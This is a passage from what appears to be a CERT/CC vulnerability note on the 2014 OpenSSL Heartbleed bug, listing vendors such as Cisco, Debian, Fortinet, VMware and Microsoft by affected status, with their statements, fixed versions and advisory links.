Affected\n\nUpdated: April 09, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.arubanetworks.com/support/alerts/aid-040814.asc>\n\n### Attachmate __ Affected\n\nUpdated: April 29, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\n`Some Attachmate products with specific versions are affected by the \nCVE-2014-0160 OpenSSL 'Heartbleed' vulnerability when TLS protocol \nconnections are used. All affected products now have either new versions \nor hot fixes available. \n \nAttachmate maintains the following technical note about affected and \nnon-vulnerable versions: \n<http://support.attachmate.com/techdocs/2724.html> \n \nIn addition, Security Updates technical notes are also available for \nspecific \nproducts: \nSecurity Updates and Reflection for the Web or Reflection Security Gateway \n<http://support.attachmate.com/techdocs/1704.html> \nSecurity Updates and Reflection \n<http://support.attachmate.com/techdocs/1708.html> \nSecurity Updates and Reflection for Secure IT \n<http://support.attachmate.com/techdocs/2288.html> \nSecurity Updates and EXTRA! \n<http://support.attachmate.com/techdocs/2501.html> \nSecurity Updates and Reflection 2014 or Reflection 2011 \n<http://support.attachmate.com/techdocs/2502.html> \nSecurity Updates and INFOConnect \n<http://support.attachmate.com/techdocs/2546.html> \nSecurity Updates and Verastream \n<http://support.attachmate.com/techdocs/2700.html>`\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://support.attachmate.com/techdocs/2724.html>\n * <http://support.attachmate.com/techdocs/1704.html>\n * <http://support.attachmate.com/techdocs/1708.html>\n * <http://support.attachmate.com/techdocs/2288.html>\n * <http://support.attachmate.com/techdocs/2501.html>\n * <http://support.attachmate.com/techdocs/2502.html>\n * <http://support.attachmate.com/techdocs/2546.html>\n * <http://support.attachmate.com/techdocs/2700.html>\n\n### Bee Ware __ Affected\n\nUpdated: April 09, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\ni-Suite versions 5.4.0 and above, up to version 5.5.4, are vulnerable. Versions 5.2.8 and 5.3.x are not vulnerable.\n\n### Vendor References\n\n * <http://documentation.bee-ware.net/display/SECU/CVE-2014-0160+-+OpenSSL+Heartblee\nd+Bug>\n\n### Blue Coat Systems Affected\n\nNotified: April 08, 2014 Updated: April 09, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [http://kb.bluecoat.com/index?page=content&id=SA79](<http://kb.bluecoat.com/index?page=content&id=SA79>)\n\n### CA Technologies Affected\n\nNotified: April 08, 2014 Updated: April 25, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={967F13F1-5720-4592-9BEB-42AD69EA14DC}>\n * <https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={7EBD736F-0227-4AEB-A7A9-9C5A4EA449C3}>\n\n### Cisco Systems, Inc. Affected\n\nNotified: April 08, 2014 Updated: April 10, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140409-heartbleed>\n\n### Debian GNU/Linux Affected\n\nNotified: April 08, 2014 Updated: April 08, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.debian.org/security/2014/dsa-2896>\n\n### Extreme Networks __ Affected\n\nNotified: April 08, 2014 Updated: April 16, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe following products and versions are affected by the VU#720951 OpenSSL vulnerability.\n\nExtremeXOS version 15.4.1.x - A patch update for ExtremeXOS 15.4.1.3-patch1-10 or higher is available for download \n \n64 bit (Ubuntu) NetSight Appliance version 4.4, 5.0, 5.1 and 6.0 - A patch update is currently available for 4.4, 5.0, 5.1 and 6.0 \n \n64 bit (Ubuntu) NAC Appliance version 5.0, 5.1 and 6.0 - A patch update is currently available for 5.0, 5.1 and 6.0. \n \n64 bit (Ubuntu) Purview Appliance version 6.0 - A patch update is currently available. \n \nNote: Please contact the Extreme Networks Global Technical Assistance Center (GTAC) for access to the patch in the event not found on the Extreme Networks support site. \n \nExtreme Networks has also published the below advisory on its website. Please refer the same for additional information. \n<http://learn.extremenetworks.com/rs/extreme/images/CERT_VU%23720951_Vulnerability_Advisory_04_11_2014v2.pdf>\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://learn.extremenetworks.com/rs/extreme/images/CERT_VU%23720951_Vulnerability_Advisory_04_11_2014v2.pdf>\n\n### F5 Networks, Inc. Affected\n\nNotified: April 08, 2014 Updated: April 09, 2014 \n\n**Statement Date: April 09, 2014**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://support.f5.com/kb/en-us/solutions/public/15000/100/sol15159.html?sr=36517217>\n\n### Fedora Project Affected\n\nNotified: April 08, 2014 Updated: April 08, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://rhn.redhat.com/errata/RHSA-2014-0376.html>\n\n### Fortinet, Inc. __ Affected\n\nNotified: April 08, 2014 Updated: April 09, 2014 \n\n**Statement Date: April 09, 2014**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe have determined that the following products are vulnerable:\n\nFortiGate (FortiOS) 5.0 and higher \nFortiAuthenticator 3.0 and higher \nFortiMail 5.0 and higher \nFortiVoice (all versions) \nFortiRecorder (all versions)\n\n### Vendor References\n\n * <http://www.fortiguard.com/advisory/FG-IR-14-011/>\n\n### FreeBSD Project __ Affected\n\nNotified: April 08, 2014 Updated: April 09, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nFreeBSD 10.0-RELEASE, 10.0-STABLE and 11.0-CURRENT have been patched\n\nfor this issue (CVE-2014-0160/VU #720951), both in source and binary \n(via freebsd-update) forms. Earlier FreeBSD releases are not affected \nby this issue.\n\n### Vendor References\n\n * <http://www.freebsd.org/security/advisories/FreeBSD-SA-14:06.openssl.asc>\n\n### Gentoo Linux Affected\n\nNotified: April 08, 2014 Updated: April 08, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.gentoo.org/security/en/glsa/glsa-201404-07.xml>\n\n### Global Technology Associates, Inc. __ Affected\n\nNotified: April 08, 2014 Updated: April 23, 2014 \n\n**Statement Date: April 23, 2014**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have determined that GTA firewalls running the following versions of GB-OS are vulnerable and should be upgraded to the indicated version.\n\nGB-OS version 6.1.0 to 6.1.5 are vulnerable and should upgrade to GB-OS 6.1.6 \nGB-OS version 6.0.0 to 6.0.7 are vulnerable and should upgrade to GB-OS 6.0.8 \n \nCustomers using GTA firewalls with an unsupported version of GB-OS should upgrade to a currently supported version.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Google __ Affected\n\nNotified: April 08, 2014 Updated: April 23, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://googleonlinesecurity.blogspot.com/2014/04/google-services-updated-to-address.html>\n * <https://groups.google.com/forum/?_escaped_fragment_=topic/mod-spdy-discuss/EwCowyS1KTU#!topic/mod-spdy-discuss/EwCowyS1KTU>\n\n### Addendum\n\nmod_spdy is affected, as are some versions of the Google Search Appliance GSA 7.0.14.G.212 addresses this issue.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23720951 Feedback>).\n\n### Hewlett-Packard Company Affected\n\nNotified: April 08, 2014 Updated: May 02, 2014 \n\n**Statement Date: April 14, 2014**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://h17007.www1.hp.com/docs/advisories/HPNetworkingSecurityAdvisory-OpenSSL-HeartbleedVulnerability.pdf>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04236102>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04236062>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04239375>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04239372>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04240206>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04242672>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04239374>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04250814>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04248997>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04255796>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04260353>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04260456>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04260505>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04262472>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04262670>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04261644>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04239375>\n\n### Hitachi __ Affected\n\nNotified: April 08, 2014 Updated: May 27, 2014 \n\n**Statement Date: April 16, 2014**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\n`Hitachi has published the below advisory on its website. Please refer \nthe advisory for additional information. This advisory includes \nHitachi products for Industrial Control Platform. \n \nHIRT-PUB14005: OpenSSL TLS heartbeat extension read overrun issue in \nHitachi products (VU#720951, CVE-2014-0160) \n<http://www.hitachi.com/hirt/publications/hirt-pub14005/index.html>`\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.hitachi.com/hirt/publications/hirt-pub14005/index.html>\n\n### IBM Corporation Affected\n\nNotified: April 08, 2014 Updated: April 15, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://aix.software.ibm.com/aix/efixes/security/openssl_advisory7.doc>\n * [http://www-01.ibm.com/support/docview.wss?&uid=swg21669774](<http://www-01.ibm.com/support/docview.wss?&uid=swg21669774>)\n\n### Intel Corporation Affected\n\nNotified: April 08, 2014 Updated: April 15, 2014 \n\n**Statement Date: April 15, 2014**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00037&languageid=en-fr](<https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00037&languageid=en-fr>)\n\n### Juniper Networks, Inc. Affected\n\nNotified: April 08, 2014 Updated: April 09, 2014 \n\n**Statement Date: April 09, 2014**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://kb.juniper.net/JSA10623>\n\n### Mandriva S. A. Affected\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### MarkLogic Corporation __ Affected\n\nUpdated: April 15, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\n`Recently a serious security vulnerability was discovered in the OpenSSL \ncryptographic software \nlibrary. MarkLogic application servers can be configured to use SSL, and \nMarkLogic uses OpenSSL to \nprovide this capability. A patch to OpenSSL has been released to address \nthis vulnerability, and \nMarkLogic has built patches for all impacted MarkLogic versions with \nOpenSSL 1.0.1g to incorporate \nthis new fix. \n \n \n \nImpacted Versions \n \n \n \nThe following versions of MarkLogic are impacted by this vulnerability: \n \n\u00b7 MarkLogic 5.0-5 through 5.0-6 \n \n\u00b7 All versions of MarkLogic 6.0 (6.0-1 through 6.0-5) \n \n\u00b7 All versions of MarkLogic 7.0 (7.0-1 through 7.0-2.2), \nincluding the MarkLogic AMIs \n \n \n \nMarkLogic versions prior to 5.0-5 use an earlier version of OpenSSL that \ndoes not have this \nvulnerability. \n \n \n \nHow to Patch \n \n \n \nWe recommend that customers who are using SSL patch their systems \nimmediately. To do this: \n \n1. Upgrade your cluster to the patch release, available at \n<http://developer.marklogic.com/products>. \n \nPatch release versions are as follows: \n \no MarkLogic 5.0-6.1 \n \no MarkLogic 6.0-5.1 \n \no MarkLogic 7.0-2.3 \n \n2. Regenerate all SSL certificates for your cluster. This is \nnecessary because the \nvulnerability is such that private keys for your certificates are \npotentially compromised. See \n\ud840\uddcconfiguring SSL on App Servers\u201d in the documentation: \n \no MarkLogic 5 documentation: \n<http://docs.marklogic.com/5.0/guide/admin/SSL#chapter> \n \no MarkLogic 6 documentation: \n<http://docs.marklogic.com/6.0/guide/admin/SSL#chapter> \n \no MarkLogic 7 documentation: \n<http://docs.marklogic.com/guide/admin/SSL#chapter> \n \n3. If you are using BASIC or Application Level Authentication over \nSSL, have all your \nusers change their passwords after you've patched and deployed new SSL \ncertificates. This includes \nboth internal users in our security database, and anyone using external \nauthentication (which \nrequires BASIC authentication over SSL). This is necessary because the \nvulnerability may have \nresulted in password leaks. \n \n \n \nIf you have any questions about how to patch, feel free to contact \nsupport@marklogic.com. \n \n \n \nMore information about the heartbleed vulnerability can be found at \n<http://heartbleed.com> or \n<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160>.`\n\n### McAfee Affected\n\nNotified: April 08, 2014 Updated: April 11, 2014 \n\n**Statement Date: April 11, 2014**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [https://kc.mcafee.com/corporate/index?page=content&id=SB10071](<https://kc.mcafee.com/corporate/index?page=content&id=SB10071>)\n\n### NVIDIA __ Affected\n\nUpdated: May 05, 2014 \n\n**Statement Date: May 05, 2014**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\n<http://nvidia.custhelp.com/app/answers/detail/a_id/3492>\n\n### NetBSD __ Affected\n\nNotified: April 08, 2014 Updated: April 08, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nNetBSD is vulnerable (in the version 6 train, not in the version 5 train) pkgsrc is vulnerable (1.0.1 versions of OpenSSL packages below 1.0.1g, no surprises there)\n\n### Vendor References\n\n * <http://mail-index.netbsd.org/security-announce/2014/04/08/msg000085.html>\n\n### OpenBSD Affected\n\nNotified: April 08, 2014 Updated: April 08, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://ftp.openbsd.org/pub/OpenBSD/patches/5.5/common/002_openssl.patch.sig>\n * <http://ftp.openbsd.org/pub/OpenBSD/patches/5.4/common/007_openssl.patch>\n * <http://ftp.openbsd.org/pub/OpenBSD/patches/5.3/common/014_openssl.patch>\n\n### OpenSSL Affected\n\nUpdated: April 09, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://www.openssl.org/news/secadv_20140407.txt>\n\n### OpenVPN Technologies Affected\n\nUpdated: April 09, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://community.openvpn.net/openvpn/wiki/heartbleed>\n\n### Oracle Corporation Affected\n\nNotified: April 08, 2014 Updated: April 16, 2014 \n\n**Statement Date: April 16, 2014**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.oracle.com/technetwork/topics/security/opensslheartbleedcve-2014-0160-2188454.html>\n\n### Red Hat, Inc. Affected\n\nNotified: April 08, 2014 Updated: April 08, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://access.redhat.com/security/cve/CVE-2014-0160>\n * <https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2014-0160>\n * <https://rhn.redhat.com/errata/RHSA-2014-0376.html>\n\n### Slackware Linux Inc. Affected\n\nNotified: April 08, 2014 Updated: April 09, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.533622](<http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.533622>)\n\n### Sophos, Inc. Affected\n\nUpdated: April 09, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://blogs.sophos.com/2014/04/09/sophos-utm-manager-and-openssl-vulnerability/>\n\n### Symantec __ Affected\n\nNotified: April 08, 2014 Updated: May 13, 2016 \n\n**Statement Date: April 18, 2014**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.symantec.com/outbreak/?id=heartbleed>\n * <http://www.symantec.com/content/en/us/enterprise/other_resources/b-symantec-product-list-heartbleed.pdf>\n * [https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160512_00](<https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160512_00>)\n\n### Addendum\n\nCERT/CC has confirmed with Symantec that Symantec Messaging Gateway version 10.6.1 is vulnerable. Please see the most recent Symantec advisory (`SYM16-007`) above.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23720951 Feedback>).\n\n### Ubuntu __ Affected\n\nNotified: April 08, 2014 Updated: April 09, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.ubuntu.com/usn/usn-2165-1/>\n * <https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1304042>\n\n### Addendum\n\nNote that the version number reported by openssl does not reflect the patch level. To verify that the usn-2165-1 fixed versions are installed, run the following command \n`dpkg -l openssl libssl* | cat` \nand compare the reported version numbers with those listed in the advisory.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23720951 Feedback>).\n\n### Unisys __ Affected\n\nNotified: April 08, 2014 Updated: April 17, 2014 \n\n**Statement Date: April 17, 2014**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\n**Heartbleed bug \u2013 Public and Client Communication**\n\nDear Unisys client,\n\nUnisys prides itself on ensuring the mission-critical operations of our clients \u2013 and the security of your systems is a priority for us. I am writing to let you know how we are addressing any risks related to the Heartbleed bug that has been reported in the news and to provide you with information that may help you address your own risks.\n\nHeartbleed is a software bug in the OpenSSL technology used to create a secure link over the Internet between a server and a computer asset such as a laptop or PC. The bug, which has existed for about two years but was only publicly disclosed last week, is believed to have affected a significant number of websites globally. \n\nUnisys has undertaken a comprehensive review of our servers, products, and client-owned servers under our management for risks associated with the Heartbleed bug. Here\u2019s what you need to know:\n\n-We have not found any vulnerability in our public-facing Web servers. We continue to monitor the product advisories of our major vendors for any potential issues. \n\n\n-The vast majority of our released products, including MCP, OS 2200, Forward!, Stealth, and Choreographer, are not vulnerable to the Heartbleed bug. Two instances of potential vulnerabilities were found in add-on products; in those cases, we have done remediation efforts and notified clients. \n\n\n-The vast majority of client-owned servers under our management are not affected by the Heartbleed bug. For servers that may have been affected, we have notified the client and after consulting with the client, we are in the process of patching those servers, changing the server side certificates and instructing users to change their passwords. \n\n\n-Currently, only version 1.0.1 - 1.0.1f of the open-source SSL is affected. We have upgraded any client-owned servers under our management to version 1.0.1g. We recommend that you check the other servers that you manage. \n\n\n-Our Security Services team can help you in this process and can also perform a penetration test to determine if you are vulnerable and help you contain any resulting damage.\n\nWe stand ready to assist you. Please contact your Unisys representative or service delivery manager to discuss your requirements or to order a penetration test.\n\nWe appreciate your business.\n\nUnisys\n\n### VMware __ Affected\n\nNotified: April 08, 2014 Updated: April 22, 2014 \n\n**Statement Date: April 09, 2014**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nVMware has released product updates and patches for all affected products\n\nlisted in VMware Knowledge Base article 2076225.\n\n### Vendor Information \n\nVMware Security Advisory VMSA-2014-0004 lists the updated products and \npatch releases that address CVE-2014-0160 in VMware products and provides \nreferences to specific product documentation.\n\n### Vendor References\n\n * <http://www.vmware.com/security/advisories/VMSA-2014-0004.html>\n * <http://kb.vmware.com/kb/2076225>\n\n### Watchguard Technologies, Inc. Affected\n\nUpdated: April 09, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://watchguardsecuritycenter.com/2014/04/08/the-heartbleed-openssl-vulnerability-patch-openssl-asap/>\n\n### Wind River Systems, Inc. __ Affected\n\nNotified: April 08, 2014 Updated: April 11, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWind River has investigated its products regarding the heart blead vulnerability. The conclusion is:\n\nVxWorks is not vulnerable. \nWR Linux 3.x and 4.x are not vulnerable. \nWR Linux 5.0.1.x is vulnerable if the optional openssl-1.0.1 package is installed. \nWR Linux 6.0.0.x is vulnerable. \nINP 3.4 is vulnerable. \n \nWind River customers can find additional information, e.g. fixes, at the online support web site <https://support.windriver.com/>\n\n### Vendor References\n\n * <https://support.windriver.com/>\n\n### nginx __ Affected\n\nUpdated: April 11, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://nginx.com/blog/nginx-and-the-heartbleed-vulnerability/>\n\n### Addendum\n\nnginx for Windows is statically linked with the OpenSSL library. We have confirmed that nginx versions 1.2.9 through 1.4.7 on Windows provide a vulnerable OpenSSL version.\n\nnginx 1.4.7, which was originally released on March 18, 2014, was silently repackaged with OpenSSL 1.0.1g on April 8, 2014. \nnginx 1.5.13 was officially released on April 8, 2014, and it also includes OpenSSL 1.0.1g, despite not specifically mentioning this vulnerability.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23720951 Feedback>).\n\n### openSUSE project Affected\n\nUpdated: April 09, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00005.html>\n\n### pfSENSE Affected\n\nUpdated: April 17, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://blog.pfsense.org/?p=1253>\n\n### Brocade __ Not Affected\n\nUpdated: April 11, 2014 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\n`TECHNICAL SUPPORT BULLETIN \nApril 10, 2014 \n________________________________________ \nTSB 2014-185-ASEVERITY: Low - Information \n________________________________________ \nPRODUCTS AFFECTED: \nAll Brocade products, including Vyatta \n \nCORRECTED IN RELEASE: \nAll current releases of Brocade products, including Vyatta \n \nBULLETIN OVERVIEW \n \nThe purpose of this bulletin is to provide information regarding the recently \ndisclosed vulnerability in the OpenSSL protocol documented by CVE-2014-0160 and \nalso known as \"The Heartbleed bug.\" This vulnerability takes advantage of the \nheartbeat extensions to the OpenSSL protocol (RFC6520). \n \nBrocade's family of IP products ADX, FCX, ICX, MLX, MLX-E, XMR CES, CER, RX, \nSX, VDX offering ServerIron, FastIron, NetIron, RX, Network OS, Brocade Network \nAdvisor, Vyatta and vADX software and SAN products offering FOS software do not \nmake use of the heartbeat extensions and hence are not vulnerable to the \nexploit documented in CVE-2014-0160. \nIn addition, the MyBrocade.com web site does not use OpenSSL and is not \nvulnerable to this issue. \n \n \nPROBLEM STATEMENT \nThe (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not \nproperly handle Heartbeat Extension packets, which allows remote attackers to \nobtain sensitive information from process memory via crafted packets that \ntrigger a buffer over-read, as demonstrated by reading private keys, related to \nd1_both.c and t1_lib.c, aka the Heartbleed bug. \n<https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160> \n \nRISK ASSESSMENT \nThere is no risk using Brocade products \nSYMPTOMS \nNot applicable. \nWORKAROUND \nNo workaround is necessary. \nCORRECTIVE ACTION \nNot applicable.`\n\n### EfficientIP __ Not Affected\n\nUpdated: April 09, 2014 \n\n**Statement Date: April 09, 2014**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nOur system uses FreeBSD 9.2 as basis, and the OpenSSL version shipped with this version (0.9.8y) are stated not be affected.\n\n### Foundry Networks, Inc. __ Not Affected\n\nNotified: April 08, 2014 Updated: April 11, 2014 \n\n**Statement Date: April 09, 2014**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nNo Brocade (Foundry) products are affected by this vulnerability,\n\n### Addendum\n\nFoundry was purchased by Brocade.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23720951 Feedback>).\n\n### Infoblox __ Not Affected\n\nNotified: April 08, 2014 Updated: April 08, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nInfoblox is not affected by this issue (in any released version).\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Microsoft Corporation __ Not Affected\n\nNotified: April 08, 2014 Updated: April 21, 2014 \n\n**Statement Date: April 21, 2014**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nMicrosoft Services unaffected by OpenSSL \u201cHeartbleed\u201d vulnerability.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://blogs.technet.com/b/security/archive/2014/04/10/microsoft-devices-and-services-and-the-openssl-heartbleed-vulnerability.aspx>\n\n### Opengear Not Affected\n\nUpdated: April 15, 2014 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * 